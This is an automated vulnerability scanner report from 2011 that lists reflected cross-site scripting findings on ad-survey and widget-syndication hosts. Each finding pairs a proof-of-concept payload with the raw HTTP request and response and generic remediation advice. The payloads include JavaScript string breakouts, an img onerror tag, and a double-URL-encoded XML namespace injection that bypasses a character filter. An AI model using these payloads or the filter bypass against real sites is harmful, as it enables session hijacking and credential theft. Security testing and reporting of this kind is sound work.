Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the lang request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d05d9'%3balert(1)//d371a7b68b8 was submitted in the lang parameter. This input was echoed as d05d9';alert(1)//d371a7b68b8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:17:43 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b103.dl
Content-Type: text/html
Content-Length: 12153

var DL_HideSelects = true;
var DL_HideObjects = false;
var DL_HideIframes = false;
var DL_Banner; // Will be bound to the DIV element representing the layer
var DL_ScrollState = 0;
var DL_width;
var D ...[SNIP]... eyClickthru = 1; }
DL_Close(false);
The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fe81"%3balert(1)//c8cdb981c7e was submitted in the site parameter. This input was echoed as 8fe81";alert(1)//c8cdb981c7e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:17:48 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b102.dl
Content-Type: text/html
Content-Length: 12181

var DL_HideSelects = true;
var DL_HideObjects = false;
var DL_HideIframes = false;
var DL_Banner; // Will be bound to the DIV element representing the layer
var DL_ScrollState = 0;
var DL_width;
var D ...[SNIP]... t); }
// Set a flag so animation loop will stop running
DL_ScrollState = 2;
DL_Scroll();
}
function DL_Adscout(adscout) { (new Image).src="//amch.questionmarket.com/adscgen/adscout_dc.php?site=28fe81";alert(1)//c8cdb981c7e&code=&survey_num=920737&ord="+Math.floor((new Date()).getTime()); }
function DL_Add(){ DL_InsertSwf(); }
function DL_FlashInstalled() { // Detect swf plugin.
The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99db6'%3balert(1)//7d7773fe9e8 was submitted in the site parameter. This input was echoed as 99db6';alert(1)//7d7773fe9e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:17:48 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b101.dl
Content-Type: text/html
Content-Length: 12181

var DL_HideSelects = true;
var DL_HideObjects = false;
var DL_HideIframes = false;
var DL_Banner; // Will be bound to the DIV element representing the layer
var DL_ScrollState = 0;
var DL_width;
var D ...[SNIP]...
The value of the lang request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85199'-alert(1)-'3cdbb99b00a was submitted in the lang parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:17:55 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b202.dl
Set-Cookie: LP=1315138675; expires=Thu, 08 Sep 2011 16:17:55 GMT; path=/; domain=.questionmarket.com
Content-Length: 2472
Content-Type: text/html
(function(){ var d=document,w=window,dle;
function ff(){ var p=w.parent,r;
while (p != top) { try { if (p.location.host == w.location.host) r = p.document.referrer; } catch (e) { }
p = p.paren ...[SNIP]... } df=biggestframe; } d=df.document; if (!df.DL_already_ran){ dle=d.createElement('script'); dle.src='http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=920737&lang=85199'-alert(1)-'3cdbb99b00a&from_node=29569&site=2'; try { if (dle.src.search('d_layer') && (window['$WLXRmAd'] || (window.parent && window.parent['$WLXRmAd']))) { dle.src=dle.src.replace('d_layer','h_layer'); } } catch (e) ...[SNIP]...
1.5. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://amch.questionmarket.com
Path: /adscgen/dynamiclink.js.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5593a'-alert(1)-'c198000a41b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5df1f'-alert(1)-'e9ed9649ab5 was submitted in the site parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 14 is copied into the HTML document as plain text between tags. The payload 1d748<img%20src%3da%20onerror%3dalert(1)>9663c0e65cc was submitted in the REST URL parameter 14. This input was echoed as 1d748<img src=a onerror=alert(1)>9663c0e65cc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/json/i/d8f94c34-6faa-457d-a8f4-cd076a3d47a2/iv/32/p/3/r/281404f0-ed39-48e6-b126-8b7c6b815cc4/rv/48/t/b8bff2cba70830bda8543e310a09cff0f90a701a000001322ded828c1d748<img%20src%3da%20onerror%3dalert(1)>9663c0e65cc/u/3/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://blogs.computerworld.com/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 04 Sep 2011 12:19:21 GMT
Expires: Wed, 07 Sep 2011 12:18:21 GMT
ObjectVersions: [Inst: req 32, db 32]; [Reg: req 48, db 48];
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web04
Content-Length: 8141
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 885f1<a>a131058bd22 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /syndication/json/i/d8f94c34-6faa-457d-a8f4-cd076a3d47a2885f1<a>a131058bd22/iv/32/p/3/r/281404f0-ed39-48e6-b126-8b7c6b815cc4/rv/48/t/b8bff2cba70830bda8543e310a09cff0f90a701a000001322ded828c/u/3/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://blogs.computerworld.com/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 04 Sep 2011 12:18:12 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web15
Content-Length: 1190
The value of REST URL parameter 18 is copied into the XML document as plain text between tags. The payload d769a%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253efc719fe9e6e was submitted in the REST URL parameter 18. This input was echoed as d769a<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>fc719fe9e6e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 18 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /syndication/xml/i/386eaecb-7c1a-4679-9118-996ea5217907/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/cb12e89655871f8e7e784dc0c08f77700c4560e6000001322d93b7f5d769a%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253efc719fe9e6e/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 12:22:33 GMT
Expires: Wed, 07 Sep 2011 12:21:33 GMT
ObjectVersions: [Inst: req 6, db 6]; [Reg: req 506, db 506];
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web16
Content-Length: 3473
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload af0ec<a>5f02f560c70 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /syndication/xml/i/386eaecb-7c1a-4679-9118-996ea5217907af0ec<a>5f02f560c70/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/cb12e89655871f8e7e784dc0c08f77700c4560e6000001322d93b7f5/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 12:21:17 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web15
Content-Length: 1696
The value of REST URL parameter 18 is copied into the XML document as plain text between tags. The payload 720ea%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253ec4be2c3bd51 was submitted in the REST URL parameter 18. This input was echoed as 720ea<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>c4be2c3bd51 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 18 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /syndication/xml/i/50c75bf0-9bd2-4e0d-b0e2-50ade412a01b/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/ea9cc84e81960189044ee72fbaecb29feddefc19000001322dae5ccd720ea%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253ec4be2c3bd51/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 12:24:07 GMT
Expires: Wed, 07 Sep 2011 12:23:07 GMT
ObjectVersions: [Inst: req 6, db 6]; [Reg: req 506, db 506];
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web01
Content-Length: 3473
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c8c38<a>b279ab99d94 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /syndication/xml/i/50c75bf0-9bd2-4e0d-b0e2-50ade412a01bc8c38<a>b279ab99d94/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/ea9cc84e81960189044ee72fbaecb29feddefc19000001322dae5ccd/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 12:22:50 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web16
Content-Length: 1696
The value of REST URL parameter 18 is copied into the XML document as plain text between tags. The payload f7074%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253e45eea47d5f9 was submitted in the REST URL parameter 18. This input was echoed as f7074<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>45eea47d5f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 18 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /syndication/xml/i/5e8294c2-2294-4553-8c7c-48f8c9ba9b95/iv/10/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/978aca9d1ea8e4d20919ae3c80f63034741644a7000001322c7cacb3f7074%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253e45eea47d5f9/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 12:21:17 GMT
Expires: Wed, 07 Sep 2011 12:20:17 GMT
ObjectVersions: [Inst: req 10, db 10]; [Reg: req 506, db 506];
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web16
Content-Length: 3475
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 459b4<a>68c24a8a00c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /syndication/xml/i/5e8294c2-2294-4553-8c7c-48f8c9ba9b95459b4<a>68c24a8a00c/iv/10/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/978aca9d1ea8e4d20919ae3c80f63034741644a7000001322c7cacb3/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 12:20:01 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web02
Content-Length: 1696
The value of REST URL parameter 18 is copied into the XML document as plain text between tags. The payload 369f9%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253e954af5fe941 was submitted in the REST URL parameter 18. This input was echoed as 369f9<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>954af5fe941 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 18 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /syndication/xml/i/7c07d8dd-4e86-4b13-a149-43e380ed321d/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/117428c72af95bf997ad05ff0976aa5ae7f12be5000001322d9f1773369f9%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253e954af5fe941/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 12:25:20 GMT
Expires: Wed, 07 Sep 2011 12:24:20 GMT
ObjectVersions: [Inst: req 6, db 6]; [Reg: req 506, db 506];
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web15
Content-Length: 3473
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e7a82<a>c05cd7645ad was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /syndication/xml/i/7c07d8dd-4e86-4b13-a149-43e380ed321de7a82<a>c05cd7645ad/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/117428c72af95bf997ad05ff0976aa5ae7f12be5000001322d9f1773/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 12:24:02 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web03
Content-Length: 1696
The value of REST URL parameter 18 is copied into the XML document as plain text between tags. The payload 87d1a%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253efda49cd4e59 was submitted in the REST URL parameter 18. This input was echoed as 87d1a<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>fda49cd4e59 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 18 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /syndication/xml/i/8334ea93-781f-4bce-bc32-094c3ddcee36/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/b80ba304ef1c35dcdad3189bdbcfd323ab4bdea4000001322d93d75687d1a%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253efda49cd4e59/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 12:23:00 GMT
Expires: Wed, 07 Sep 2011 12:22:00 GMT
ObjectVersions: [Inst: req 6, db 6]; [Reg: req 506, db 506];
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
